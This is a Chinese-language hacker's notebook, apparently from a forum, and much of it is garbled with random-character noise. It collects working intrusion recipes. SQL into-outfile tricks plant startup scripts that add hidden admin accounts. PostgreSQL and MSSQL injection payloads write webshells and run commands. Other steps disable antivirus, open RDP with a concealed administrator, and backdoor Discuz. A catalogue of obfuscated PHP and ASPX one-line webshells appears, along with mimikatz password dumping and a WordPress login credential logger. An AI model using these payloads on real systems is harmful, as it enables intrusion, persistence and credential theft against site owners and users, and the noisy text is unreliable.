use test;
6 V0 }& ?" C6 a; Ucreate table a (cmd text);
8 l: ~ ~) V; {( `. ]- zinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
4 Z T- \8 B' Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
2 w+ v D' J: Z C/ R! T0 n8 Iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
) A U1 n+ j' U" F" G3 nselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
+ Y1 {2 J5 U4 Sdrop table a;
) q( C( `1 W8 A) }( d. \; T
, T- D ]5 W. T5 n8 c. B0 ], v英文版本:+ n2 J6 A1 q7 Q% {9 i
& d, p B3 p$ k: \+ e6 z/ Zuse test;
0 a" I% e# _4 e5 o# {& x) z% F) @# H+ Tcreate table a (cmd text);
% p. U' `, W A/ i [% Y) Q- V/ oinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
: R( E" J% @/ a+ t7 p* linsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );! T) \( h+ H8 Y2 q" c
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );5 S: H+ ^: q! q1 k* g
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";$ b1 q; ^. E" c6 K+ \% l: S
drop table a;
( n/ N& ]) A1 G' {+ c
$ c8 I- D/ Z. Gcreate table a (cmd BLOB);
0 t+ n4 b% s V" z2 W- Cinsert into a values (CONVERT(木马的16进制代码,CHAR));
) a9 q0 v6 V4 `8 d6 xselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
! R- |/ [( h |% F0 L% e1 e1 Wdrop table a;3 H) X1 G" O- w
2 w7 C$ d$ N( h
记录一下怎么处理变态诺顿1 K; T3 f+ I: `
查看诺顿服务的路径3 v. |4 P' n: S( u) h: y2 U
sc qc ccSetMgr
( B z* j# ]' ~: P1 [, J然后设置权限拒绝访问。做绝一点。。
4 f9 t" D( Y) T3 tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
! h+ j8 H- g% ]/ z4 F- I" fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
# S* c6 T6 E( T7 a5 A4 ~5 s; G. U Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators0 J+ q: \/ k' q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone2 Q% Q7 m8 O6 W7 Y5 w8 s8 M
4 l# S$ E5 C5 [; _. j! K! Y3 K# a然后再重启服务器
' ~) z" P. J) n! ?4 U- E# z' biisreset /reboot
' `. l& _5 v o! _+ D0 b3 y这样就搞定了。。不过完事后。记得恢复权限。。。。
) T8 M6 b, t2 I8 N7 ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
+ S+ i" S& R; K0 h. C! p( ?/ i6 F4 A6 Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F) Y) W3 m# W s; t
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F3 |5 a' O$ `' ` B- x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F* E5 O3 U0 ~& u- X0 a
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
; x$ }+ V; {# \) \6 c5 ~$ _$ z! ^) w# r1 _
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')$ p3 l$ i$ Z1 q) l! Q! Q3 ~. m: w
$ @2 k9 C2 R" q- l a0 B+ R
postgresql注射的一些东西
3 }, R. C8 r5 U. r8 f5 b) Y* _如何获得webshell# p% H) a% N, R
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); / X+ W" y4 T0 c, t
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ; M& x- {/ o' I m
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
# i" M1 P+ w6 n0 V3 }" J6 a) `6 q如何读文件 T3 A6 B# z) @' w
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);5 Z* L: R, a# ? ^" J* q/ ]
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;" }# A: f! c. J1 n/ K: c
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
- U3 _9 o% V% X' Z
( O( i# A9 F3 Gz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。! ~, Z0 u) P- G9 j) N" c8 b
当然,这些的postgresql的数据库版本必须大于8.X
. g/ b- {7 b; X% k# Z% X创建一个system的函数:
& Y5 j8 l( q! w+ ~$ s1 @CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
4 N P. P/ _; K- c$ z i; q
8 D2 T9 c. {6 l8 y创建一个输出表:
4 B/ i% N* @0 r, oCREATE TABLE stdout(id serial, system_out text); [, J2 U; d( s$ j
" s4 d' ^! |2 u1 H% j- v执行shell,输出到输出表内:
* X# O6 R2 P% q2 k% W5 ]SELECT system('uname -a > /tmp/test')
- _. Z! G; F6 W+ j& F2 f; Q" z! f( h9 c: N( m: k" I: _, r
copy 输出的内容到表里面;
9 x, V/ I" E3 }$ n, NCOPY stdout(system_out) FROM '/tmp/test'8 k: _) g: P, [ H7 J
9 a) A/ |4 g* i' r从输出表内读取执行后的回显,判断是否执行成功: w+ C7 ]7 A0 e1 [9 }* C) w3 L
5 x! V; F$ ?2 v3 |: w# N
SELECT system_out FROM stdout
% J% c2 q+ S% P2 m; H3 X下面是测试例子% j& F {% {* r0 x
" o' a( f M# N0 G# G% s, s! X
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
% p- ?8 H& h! _7 ]( D+ x$ B" u7 C0 z/ c% L
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
$ }$ F. _( s+ W% O9 A) h# [% USTRICT --
3 p& g" ^' n: p8 ?6 R7 n/ o9 i/ U: _# s* ~! R& V
/store.php?id=1; SELECT system('uname -a > /tmp/test') --3 L9 I0 K' w3 k$ u& l
6 k4 m& P4 \" T4 c/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
" V: v* d/ Y/ K8 T
/ A; ]+ l4 l5 E: T/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--) p# c) Q+ B" L3 A5 w
net stop sharedaccess stop the default firewall( w( u( x3 Z# u, K3 S; m, g
netsh firewall show show/config default firewall
" l! M0 F* J6 [9 E/ gnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall5 E, O9 g$ x8 Q( u/ |
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
7 s! A* e3 e, h |1 m修改3389端口方法(修改后不易被扫出)/ T# d: _4 L* G
修改服务器端的端口设置,注册表有2个地方需要修改
1 _5 Y4 h' x8 x" ~4 X" J6 F3 p' @& V; M* ~8 m! k
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]: E/ K8 B4 H' Y0 B, k
PortNumber值,默认是3389,修改成所希望的端口,比如6000- a2 F7 Q* _# R* J5 d
' s. r- z. I. o# W( N
第二个地方:; {8 l$ N3 a# H7 P" g W
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ( t/ n; I3 {& s+ S1 w$ Z1 q6 V
PortNumber值,默认是3389,修改成所希望的端口,比如6000
' U, w8 Q! I' u6 L) H7 C4 B$ q( \3 s0 U* M% D- X- T! l2 F+ m& U, e5 p
现在这样就可以了。重启系统就可以了$ t1 X N& J1 G: x# u' i4 Q
2 B& G( n5 h4 W9 z查看3389远程登录的脚本1 j7 W* [8 p: o0 ~
保存为一个bat文件& M5 }5 n/ W7 m) c& n
date /t >>D:\sec\TSlog\ts.log
) G9 \7 w: ~# v/ T; z: Utime /t >>D:\sec\TSlog\ts.log: ?- b8 O) O+ a% d# z, I4 r6 [
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
- L! N+ H, a6 O) Ustart Explorer: Y% o/ g7 E0 n- D; }8 f
% q# b6 }% ]* j( j h" \! E* m7 Lmstsc的参数:
) f# t6 Y9 q" s' r8 X# X2 N+ }) j2 n' y% t0 ~
远程桌面连接& }6 z9 e/ }+ e9 A: G& v4 d! z* `
0 u. @7 O. O% K2 @1 E
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]5 R; E3 z( P4 N/ k
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?0 N7 |( C: V% u; c4 v: ]. H
& H$ W' J4 T/ k
<Connection File> -- 指定连接的 .rdp 文件的名称。4 }0 z4 Y8 _' Q! K$ v6 _. j1 `
% U' j! h9 y R; L/ l/v:<server[:port]> -- 指定要连接到的终端服务器。
" y! _. k/ k1 u7 t/ c/ ~
* a- _% L" H/ e3 e& S1 h4 b Z5 n" W/console -- 连接到服务器的控制台会话。/ ~; K# X; S8 A( x' s9 k
6 @( m, a* Q& w; y! C J- m+ \7 _
/f -- 以全屏模式启动客户端。
7 H# Z: @0 d: l4 o. y+ x/ Z- T) x
/w:<width> -- 指定远程桌面屏幕的宽度。" B$ }* h# b, d: v5 k; v
7 V+ K/ H1 z4 v) g. C% D
/h:<height> -- 指定远程桌面屏幕的高度。8 U+ z* A5 e/ e4 E6 Y
: T5 {) v. @. O2 n6 d/edit -- 打开指定的 .rdp 文件来编辑。7 _/ j9 l! ?" y
( w6 I5 J3 K. q' ~1 R/migrate -- 将客户端连接管理器创建的旧版
$ X E$ ~# H7 U; Q# M7 a连接文件迁移到新的 .rdp 连接文件。' S# y. g9 e1 a$ o! S/ h
$ F: ^1 h+ B% e4 i/ x; f, }
5 ?; }, p! U! A: @4 x# _- q! r, q其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就9 L f/ X% F# z9 [
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
. W- K2 M# ]2 P S4 C% F
$ ?' T) g8 s; `# s/ Y7 i# X4 [( O命令行下开启3389
9 i5 U( u5 p% _net user asp.net aspnet /add5 e. n% Y. u# b) E+ z
net localgroup Administrators asp.net /add
& w$ E& I5 f4 T l$ F- Inet localgroup "Remote Desktop Users" asp.net /add
& w* G+ t8 ^- t, M- k( ~- `attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
7 [+ X7 a1 Z4 J9 R+ \( `. W" ~0 Recho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
3 W" \7 h6 u$ `echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 18 x5 Q; B/ e: g( O( R6 j1 c
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
$ Y( e N) k) T1 T9 P# I0 Zsc config rasman start= auto
0 E& ]( w k# B* Psc config remoteaccess start= auto
B* H# s9 k3 w: w$ G& Rnet start rasman& r# j1 v# v" g/ K. w7 u# G/ o
net start remoteaccess
" p" K) D4 Z: x; L% F9 sMedia
2 i, l |( a& a0 K, P2 ^<form id="frmUpload" enctype="multipart/form-data", J% B- P! u B( R
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>8 e# S# M1 `( M1 A/ X1 ^
<input type="file" name="NewFile" size="50"><br>
A3 v& ^8 P- _: H( [: a% s<input id="btnUpload" type="submit" value="Upload">
: w5 G3 ] h& t) G. |& C8 Z, R</form>- f' ?2 L8 Y, o# z% x/ r/ n3 K
) A o4 R2 w/ B- V! t. x8 x
control userpasswords2 查看用户的密码
- v O5 U, }* d7 ~access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
2 h# x% b5 V" h8 [! j7 ^0 h0 hSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a& C& f! h5 p9 n# \6 D3 {
) F) D1 S! `/ U0 A; E5 f' [
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:" V, f u, M U3 q4 n, H
测试1:6 p5 V. X& |6 ~' r4 s: Q
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t16 U7 B1 K" n/ N: t3 j
1 d; s* }1 y- f( ^! |) p' p) X
测试2:
; g* p) O, r5 J) w+ q- \( X
9 ]7 m4 F# g$ J1 K @create table dirs(paths varchar(100),paths1 varchar(100), id int)
! \- r) f( z9 E1 a; X
2 X+ @) P0 F: O- u D) {2 V; {% c- ~9 odelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) @; o; }$ \! A4 {( c: J0 k
3 ^+ J, D5 ~& M( S4 ]7 h5 w
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
! d7 C" k/ b3 ?- u关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令1 g3 a1 u A q' l0 g- M- G
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;+ l. W8 {. a# a, {5 o j. ]
net stop mcafeeframework0 p0 |! z$ i# i7 S8 J
net stop mcshield
. F k7 u3 I% ]( _; v$ onet stop mcafeeengineservice" f p" B, H' b* c" E
net stop mctaskmanager4 h/ h( A6 Y# m6 F+ _6 T3 K5 j; D( y
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D a" E( ]3 C0 h5 q7 Q, u
* a, W1 n) D9 n& H2 Z% i, [6 w9 a VNCDump.zip (4.76 KB, 下载次数: 1)
" U# `2 Y$ @- }+ X% O密码在线破解http://tools88.com/safe/vnc.php1 V& C1 d, H! c$ H9 s
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取( t: Q3 ~2 n0 C
4 b o! _5 y3 y) E9 q6 d6 D" T
exec master..xp_cmdshell 'net user'
8 j. n1 Q0 F: ?; p* hmssql执行命令。. o0 N0 Q# J* N1 k0 F* a+ x( h( j
获取mssql的密码hash查询
6 M- c4 y) T8 y- _( hselect name,password from master.dbo.sysxlogins. c8 d8 q$ I* B4 n8 b$ a& P$ l' ^. [
$ q7 S$ A% T* ]6 Qbackup log dbName with NO_LOG;/ j& `5 T( A& d, t/ u
backup log dbName with TRUNCATE_ONLY;% A2 ]. A2 H# G7 [
DBCC SHRINKDATABASE(dbName);
. B( v4 c: ~0 S* N3 P% k0 C+ F# Mmssql数据库压缩3 K+ m6 q! `5 _0 D
0 s6 E* |9 v4 rRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK! W2 R5 b6 f$ G" Y5 |
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。' }5 ~% V! M3 @6 w6 T
/ J5 g0 d( _0 Kbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak' j8 |9 e) W9 Z7 E F7 F7 y
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
l4 s9 p4 Q$ L# |" c8 U5 J& {! v/ V% ?5 d2 M! }: W0 s+ E. u
Discuz!nt35渗透要点:. Y; a( U+ e; J5 ]
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default% p @: D0 r! H8 a. _
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>2 P9 M+ ~: ? s5 W+ Z
(3)保存。
( j1 z) I* h* g$ T4 I(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
2 v5 i( I3 C# h1 I; od:\rar.exe a -r d:\1.rar d:\website\( M. z1 c1 C. _1 s! d) ^
递归压缩website
$ `& u2 R) }! d0 p! T注意rar.exe的路径
* ~" g2 V0 n8 p# r5 l& e+ }* L6 Y ?; _; v2 s% i s9 A
<?php: f x6 g& z" z. ]3 O. x
5 A0 K6 G, L' I% W5 E/ C% f
$telok = "0${@eval($_POST[xxoo])}";
. |3 u- f6 Q: `2 W0 [, o# G: S/ @2 x) S$ b5 V3 E% {
$username = "123456";
3 ?; p( D) E1 c' I
) G# [ b% P4 F2 O, g5 n$userpwd = "123456";
Y0 N, T8 U" Z j. R4 K
8 Y0 J7 d9 C# l0 Z+ n' q, B$telhao = "123456";
# W" h. u0 S, m U- m, y; ~, U6 T; t
$telinfo = "123456";- o/ [! z6 Y0 T. s/ _3 m
* @. @9 B) J4 D) C8 e
?>
: b! [- ^' \4 {1 r jphp一句话未过滤插入一句话木马) Y9 b* }# X4 _5 C4 x/ L
- I" [) s9 z: B9 K- g1 T5 G
站库分离脱裤技巧
; ]- I% ]5 H- Wexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'8 w1 y& n; \ Z: d
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
& I' Q K* U+ U/ c: Y条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。2 Z: L: s# ]/ F
这儿利用的是马儿的专家模式(自己写代码)。6 |3 u% {$ B# U6 Y1 D
ini_set('display_errors', 1);, a+ ?! C1 ~5 P' _% h0 \
set_time_limit(0);
# o, j Z( Z# zerror_reporting(E_ALL);
% Z; t" O+ f" k# O5 f; P$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
" K, q" O' [6 p' x5 ^mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());. N" m4 V3 R+ ~. g; ]
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());$ P0 u$ P: b" |" D
$i = 0;' t% q: | B$ \8 P9 u" a$ T
$tmp = '';* ?% _7 I; L+ e. F
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {, d, s% y$ o3 d8 w8 `9 F5 v/ A
$i = $i+1;$ L' }. W, E3 B; |
$tmp .= implode("::", $row)."\n"; k0 O8 `1 {8 L0 S8 B6 P
if(!($i%500)){//500条写入一个文件/ E& V4 ^- u- M% y1 E- F
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';: b: o+ A3 g6 Y9 o) d
file_put_contents($filename,$tmp);
. C' D" |2 x# g! l" \ $tmp = '';: S; o/ Q5 v8 F
}8 l9 d- s9 p6 J
}2 T8 U2 h2 _# p/ H) v% V! W# l
mysql_free_result($result);; Q+ x% `6 r0 \/ y+ e! L
1 ^" M! K6 s/ r* N' G
) k$ C9 i; N* `( _# c+ a. L, \# v, i1 O! I" `
//down完后delete
8 c3 y' c9 O3 A) g5 X" @. A6 u6 j4 Y8 G. P j2 ^8 {
) G, N3 f: X! E1 G/ c! pini_set('display_errors', 1);
3 X# v* V) w( A$ ferror_reporting(E_ALL);
/ Z1 K8 e6 T* s: X$i = 0;4 T# F" `1 h$ ?9 N7 i7 r+ }3 m
while($i<32) {% u; S: r6 l3 e
$i = $i+1;
% }2 }* E; l0 G4 u# G& _ $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
1 d( R! i* f- l0 S, Q1 S; c4 z& D5 q unlink($filename);, z: b/ U- \) N7 n2 B8 Q& b- Q% J* }7 Q
} $ |- t) M3 ]; A: A1 o: g) i
httprint 收集操作系统指纹
4 t; P4 P: j" {* S, Y' t扫描192.168.1.100的所有端口5 [6 W' _7 |* d/ ~8 p" j4 I& I
nmap –PN –sT –sV –p0-65535 192.168.1.100
) m- [) e2 \/ l+ ehost -t ns www.owasp.org 识别的名称服务器,获取dns信息
$ Z) a- T! O& [6 t( O3 bhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输# B' c! a- q- d
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host# J7 I3 E8 k7 `8 r4 L; _
3 g9 o$ o) K x+ m
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)' ]" R& v/ U2 B# p8 I
+ d4 z4 z' N5 \- i MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
/ H, P! z4 Z, ?- V+ v: W
+ D: C) \/ ?* T; M4 Y% s5 I Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x( G2 ^, z: G# v7 D
9 ^5 N* R$ v: B
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
2 F% O$ ]6 u% }! G, J5 K
* M+ J, n1 v# E( G5 k1 Y9 [& z; h http://net-square.com/msnpawn/index.shtml (要求安装)
% g, H& k6 p; o; `9 ?1 x a/ M
6 Z" u9 G) w) e+ K( k4 Y- h5 r0 o tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)% K, i: H G, g! G5 g# N
, o0 Z4 N2 w( B! J" O
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
/ a& P8 K, w4 i. V Kset names gb2312
9 w! l, \! Y/ \4 S! }# N4 [导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。: l3 \. Y0 X6 |7 d
" V0 ?8 N( U4 B' ?4 Xmysql 密码修改
2 x, y, |+ L+ `! t) LUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 4 s0 g$ N$ N- J
update user set password=PASSWORD('antian365.com') where user='root';) o1 C# `. j! z7 P" @) L
flush privileges;
. {2 w. _7 [9 b高级的PHP一句话木马后门* l" i4 L! a: i& I
b2 [- P0 @3 c
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
6 G0 t" B$ {2 `. k2 I3 J5 |0 `3 r4 I2 O: Y# M9 [/ U4 E$ v% }
1、
4 [1 M$ l) s9 T* E, c( b0 ^2 |/ s; t+ W u
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";) }0 a/ q; d% E9 ~. D
% [& {" [7 D" k$hh("/[discuz]/e",$_POST['h'],"Access");
}+ b/ c& _0 r! k4 C$ y: z
& `( r; H$ J/ q//菜刀一句话6 u: Z* Q: Y! ~* E6 z6 E: E
6 ]! d8 i' q4 r# c2 n
2、
8 _' h3 j7 D' Z7 F! `! J
& U1 r4 y) h! g' K. i7 U9 n+ A) h$filename=$_GET['xbid'];% G- ?1 A% k! |3 m
+ e# ^' \! @) K: X2 J$ Kinclude ($filename);
* U4 D0 a3 I9 a. K: y# x
" I/ ?) |/ k) [# ?) i//危险的include函数,直接编译任何文件为php格式运行: [: I& V% c! i6 w$ o" Y* {1 p4 X
( @, G1 {5 e! x9 ]! e$ c
3、3 f( v+ G& S& p- ]' a, k
. [/ n6 u8 ` {; y* r& y2 l$reg="c"."o"."p"."y";
9 @. b4 Z- i, X/ q& t; U2 a# t0 \' W4 v) P& p) |1 t+ F' P7 i
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
' u3 r" _. B& I. X' ` P( r
# Q* K+ S6 Q0 C7 l) P# u4 s//重命名任何文件. _. \; g8 E4 v B
: M! P( [- j$ ^0 S4、
& [8 a% p0 ?: \- L7 ]" g1 ^7 i* d! [! U) V7 L% _# @4 ~
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
4 \- ]; ~; Q" Q8 {8 D1 @9 _- a9 V* Z
$gzid("/[discuz]/e",$_POST['h'],"Access");9 A* i( d Z& ?2 M% P9 l3 R; ?
- @5 Z% E# q1 P6 M
//菜刀一句话5 N/ v; ?4 K' V
) t3 {3 G' i- x$ d
5、include ($uid);; h6 u, U+ I4 X
2 H/ g9 o. c+ ~
//危险的include函数,直接编译任何文件为php格式运行,POST
& X1 B e: X4 @7 i1 ^, S0 p
' l! ^# P$ a2 t( }. }3 q* J0 _
$ h2 i- I7 F1 i& E* k' g; L9 }//gif插一句话
: ~! E9 D& E0 y% {7 z8 X+ }, y+ b8 L* b+ ?/ z: Z. v8 t. x
6、典型一句话6 M/ U; l0 T6 h: O, N0 g/ O
2 {" P: b9 n; C) H& n* N程序后门代码
, L- E# t: F2 S! L6 [! P<?php eval_r($_POST[sb])?>
# Z( H, @" ]4 v" l5 u程序代码
, ^% w3 \( w) D1 O, k<?php @eval_r($_POST[sb])?>
3 B8 }8 ~" Q! a* ~$ y7 ^//容错代码
5 A A* K# J0 S3 d程序代码
+ S% {# s2 D8 [ l* H, a7 W; _- \<?php assert($_POST[sb]);?>$ k) l0 `1 D o4 a
//使用lanker一句话客户端的专家模式执行相关的php语句
9 Q0 `& |' d' |5 W) F, x1 m/ i程序代码
1 p9 [/ k$ B) o+ r<?$_POST['sa']($_POST['sb']);?>
2 g; S% |/ P- Y3 }6 ?) q程序代码8 w9 k1 s8 K% L |$ G( W- q
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>! R1 L5 ?" d" f5 ]4 [# P, c1 `- H
程序代码
, T) [8 S! g- ^% U8 O; j' |: [<?php
' S& f9 ~+ S3 r8 T D* f@preg_replace("/[email]/e",$_POST['h'],"error");
2 f1 k4 Q9 ]* T?>
1 _& f0 t* T/ p$ d5 B//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入' t$ \3 I* r; u$ M1 _& W# A
程序代码4 T, m+ i- P6 y4 I4 [* K
<O>h=@eval_r($_POST[c]);</O>8 N3 q7 X. G7 m' C) P0 a
程序代码# ~# p( v' C8 J8 j6 W* V, W
<script language="php">@eval_r($_POST[sb])</script>
/ \1 b* u; b5 p//绕过<?限制的一句话
& t1 n/ T0 n9 d$ R' C/ w( ?) j( e6 H6 z9 P8 F& U% x
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
: u) O- G0 F- P; Z详细用法:" C# e5 X* o% H3 m6 k8 Q, L4 z
1、到tools目录。psexec \\127.0.0.1 cmd2 A, S d4 Y! m$ ~! b1 [7 \
2、执行mimikatz
+ G' k2 u6 P' b. d+ v A$ D9 ?3、执行 privilege::debug
9 a" J% f$ s, l, a+ c+ `3 Z) }4、执行 inject::process lsass.exe sekurlsa.dll, b+ t4 y, ~9 Q* n( I
5、执行@getLogonPasswords
" v' c1 l" d/ W8 u/ I$ \1 x# J6 `6、widget就是密码6 M: }+ Z* _9 e7 w
7、exit退出,不要直接关闭否则系统会崩溃。
- M6 B, g" U1 K \1 ~9 X" {( E; q8 Z# @* w$ w1 @
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面- q7 j+ n% j3 J6 L1 x( L
0 S+ j$ F3 p: [% I' m! ^自动查找系统高危补丁
) ?$ d1 b8 J! P5 I7 [6 l1 F4 S7 Hsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt# [7 U, v7 c+ S, j* F: }& H
; n7 F7 m! I/ u# n
突破安全狗的一句话aspx后门% B2 a d3 e& e$ H9 m) X
<%@ Page Language="C#" ValidateRequest="false" %>
7 @6 f2 i- ~4 a<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
0 v( [& I: X2 c$ ?) A( Y/ Z0 Iwebshell下记录WordPress登陆密码
3 Y3 ^& u8 G* Kwebshell下记录Wordpress登陆密码方便进一步社工! w: r$ x* L7 D. j7 `
在文件wp-login.php中539行处添加:
/ N; q% A* L7 q' L4 B// log password9 E3 k# [( U) O; r0 a/ M' j
$log_user=$_POST['log'];
( y! ?5 k: l* Q3 y9 s! T$log_pwd=$_POST['pwd'];
5 O& L# t( j+ X& r1 F' s9 p" k1 _2 x$log_ip=$_SERVER["REMOTE_ADDR"];0 Q: T# |8 x. p0 M5 r
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;+ ^0 l' \! l) [& t& A, }
$txt=$txt.”\r\n”;( r- s6 A' @, c5 b* [$ ^
if($log_user&&$log_pwd&&$log_ip){
4 j' e% U4 I4 z( E6 Y@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
2 |/ v) ]1 U& O' G# a$ n. l}
/ }$ u+ i ~& b9 i% I当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
+ P: _6 }& T" I: k) c' j: L. G就是搜索case ‘login’* E4 F& v6 O9 s
在它下面直接插入即可,记录的密码生成在pwd.txt中,* n" Q; Q+ t T, h$ B+ ^4 d6 P; c
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录, C, P" ?/ ?7 X' ~. X
利用II6文件解析漏洞绕过安全狗代码:
